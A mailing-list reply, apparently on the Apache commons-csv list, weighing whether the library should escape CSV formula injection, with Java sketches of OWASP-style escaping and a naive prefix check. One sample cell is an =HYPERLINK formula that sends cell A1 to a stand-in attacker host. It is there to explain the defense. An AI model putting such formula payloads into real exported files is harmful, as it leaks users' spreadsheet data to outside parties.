The TLDR version:  OWASP's recommendation is specifically to render code intended to be executed as unexecutable.  I'd suggest that any fix be done in the OWASP-Java-Encoder project and not here.  I believe that providing this feature, even at OWASP, has near-zero value in the long run because the purpose of formulas in Excel IS to be executed--and Microsoft already offers the best speed bump.  Here be dragons!

I apologize.  This is going to be a TLDR response because I don't know any of you professionally so I'm erring on the side of completeness.  Sincere apologies if I'm stating things you believe to be obvious, or am myself ignorant of something obvious.

So I think there's a misunderstanding with regard to the threat described by the OWASP article.  The threat is explicitly *FORMULA* execution in Excel--and LibreOffice.  It sounds similar to a browser problem but it's not; it's far worse.  This particular threat tends to be out of bounds in bug bounty programs and in CTF contests because the attack that exploits it is a social engineering attack, which always works in the real world.  That's why bug bounties won't pay out for it.

The recommendation from OWASP is as follows:

Encode the offending characters to:

 * Equals to (=)
 * Plus (+)
 * Minus (-)
 * At (@)
 * Tab (0x09)
 * Carriage return (0x0D)
 * The set [;',"] be similarly escaped

While this would be a mitigation, it would also *purposefully break any formulas* placed into a csv cell.  This is a critical point, and I'll come back to it later.  It's all or nothing.
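
To make the "all or nothing" point concrete, here is a minimal sketch of that kind of escaping in Java.  CsvCellSanitizer and sanitize() are hypothetical names I made up for illustration; they are not part of commons-csv or the OWASP Java Encoder, and the exact rules (leading single quote only on trigger characters, doubled quotes, whole field wrapped) are my loose reading of the OWASP page, not a definitive implementation.

```java
import java.util.List;

/** Hypothetical helper for illustration; not an API of commons-csv or OWASP. */
final class CsvCellSanitizer {

    // Leading characters flagged by the OWASP page: = + - @ TAB CR
    private static final String TRIGGERS = "=+-@\t\r";

    /** Returns the cell forced to plain text and wrapped for CSV output. */
    static String sanitize(String cell) {
        String value = (cell == null) ? "" : cell;
        // A leading single quote makes the spreadsheet treat the cell as text.
        if (!value.isEmpty() && TRIGGERS.indexOf(value.charAt(0)) >= 0) {
            value = "'" + value;
        }
        // Double any embedded quotes and wrap the field, so separators and
        // quotes inside the value cannot be used to start a new cell.
        return "\"" + value.replace("\"", "\"\"") + "\"";
    }

    public static void main(String[] args) {
        List<String> cells = List.of(
                "=SUM(A1:A10)",   // a legitimate formula
                "say \"hi\"",     // embedded quotes
                "plain text");    // ordinary data
        for (String cell : cells) {
            System.out.println(sanitize(cell));
        }
    }
}
```

Note that the legitimate =SUM(A1:A10) comes out with a leading single quote just like a hostile formula would: the accountant gets text, not a total.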

This is where Phil's comment comes in:

First, let me stress again the risk:  The threat isn't masking cell contents, it's *execution* of normal logic in a malicious way.  This is the €1M question:  "How do we differentiate corrupting values from valid values?"

Asking this csv library to do it means it has to take on quite a bit of intelligence.  It doesn't just have to understand what a CSV format is anymore.  It has to answer questions like "*What does a corrupt equal sign look like?*"  And it looks like a valid equal sign.  So to do this right, you have to do lexical analysis and parsing the same way that Excel is going to do it, and THEN you have to infer behavior.
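
A rough illustration of why a token check can't answer that question, again in Java.  PrefixCheckDemo and looksDangerous() are hypothetical names, and the sample cells (including the attacker.invalid URL) are made up for the example; this is a sketch of the naive approach, not anything commons-csv does.

```java
/** Hypothetical demo for illustration; not an API of any real library. */
final class PrefixCheckDemo {

    /** Naive check: flags any cell starting with = + - @ TAB or CR. */
    static boolean looksDangerous(String cell) {
        return cell != null
                && !cell.isEmpty()
                && "=+-@\t\r".indexOf(cell.charAt(0)) >= 0;
    }

    public static void main(String[] args) {
        String[] cells = {
            // The accountant's yearly total.
            "=SUM(B2:B13)",
            // A formula that tries to leak a cell to a remote host.
            "=HYPERLINK(\"http://attacker.invalid/?x=\"&A1,\"Click for details\")",
            // A negative amount.
            "-42.50",
            // A user handle.
            "@phil"
        };
        for (String cell : cells) {
            // The check cannot tell these apart without
            // understanding what the formula actually does.
            System.out.println(looksDangerous(cell) + "  " + cell);
        }
    }
}
```

Every one of those cells is flagged.  Telling the second one apart from the first is exactly the "parse it like Excel and then infer behavior" job.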

Therefore, to determine what corrupt characters look like in data designed to be executed, you are now in the business of trying to interpret what the Excel formula is doing in order to determine whether or not it's safe.  This is the core problem: formulas are bits of /user-supplied code/ *designed to be executed*.  If you escape it, you break it.  At best, you annoy the hell out of the accountant who was expecting your web app to offer a usable spreadsheet, while adding one layer of manual intervention on top of the standard warning that MS Office provides whenever you open an Excel file not created on your machine.

So... what can we do about it?  Microsoft already did it:

IMHO there's nothing that any intermediary library can do that's any better than this.    Web applications designed to take spreadsheets as input are special beasts.  The proper security rule of thumb is to always ensure DATA is treated as DATA.  But that rule gets *really funky* when that DATA is actually supposed to be executable code.  But that's your choice:  if you don't want it to execute you have to force it to be data, which will break execution by programmer intent.

However, I suspect a few of you will be unhappy with my "do nothing" suggestion and insist that something ought to be done.

I would recommend writing a CSV encoder for the owasp-java-encoder project.  The framework is already in place and it's where I push people if they only need encoding functions.

Why I wouldn't do it here:  libraries like this have to be written to the lowest common denominator, meaning csv format projects that don't have Excel as a target.  You want security functions to process as close to the business logic as possible, and this is the wrong target for that.  Doing it here means not breaking legacy code, which means that by default the option will be off.  (Or you follow a deprecation strategy.)  Further--this gets to my original hint about threat models--executing formulas in cells is a /desired function/ of Excel and its copies.  When developers start breaking spreadsheets, they're going to revert to legacy behavior, meaning you're really talking about improving the defensive capability for the security-minded developers that can stand up to the finance department.  When OWASP tells you "This attack is difficult to mitigate," it isn't just the technical issues involved--which I just outlined--it's social.  This is why I'm hesitant to offer up "We'll do it in ESAPI," because I don't see the value-add in the bigger picture.  Plus, *this is Microsoft's fault* and I'm not thrilled with writing code to speedbump *their* problem, which I feel they've addressed as well as they ever will.

On 11/11/2021 4:36 AM, P. Ottlinger wrote:
Hi guys,

thanks for your reply.

Maybe I'm misinterpreting something but I thought that it could be made
possible to configure CSVFormat-object when writing the CSV data in a
way that any data with possibly corrupting values (as shown on the OWASP
page) will mask the whole contents of the cell.

Thus a library such as commons-csv would be able to lower the risk for
CSV injection and not every client/customer would have to manually
create this protecting logic.

To my mind it's a simple parser for "dangerous" tokens that quotes the
given data with additional " .... as we do not need to write
functioning Excel formulas into CSV.



On 10.11.21 at 20:53, Gary Gregory wrote:
I agree with Matt. CSV is just a container, it doesn't know or care what
the concept of a "formula" is.


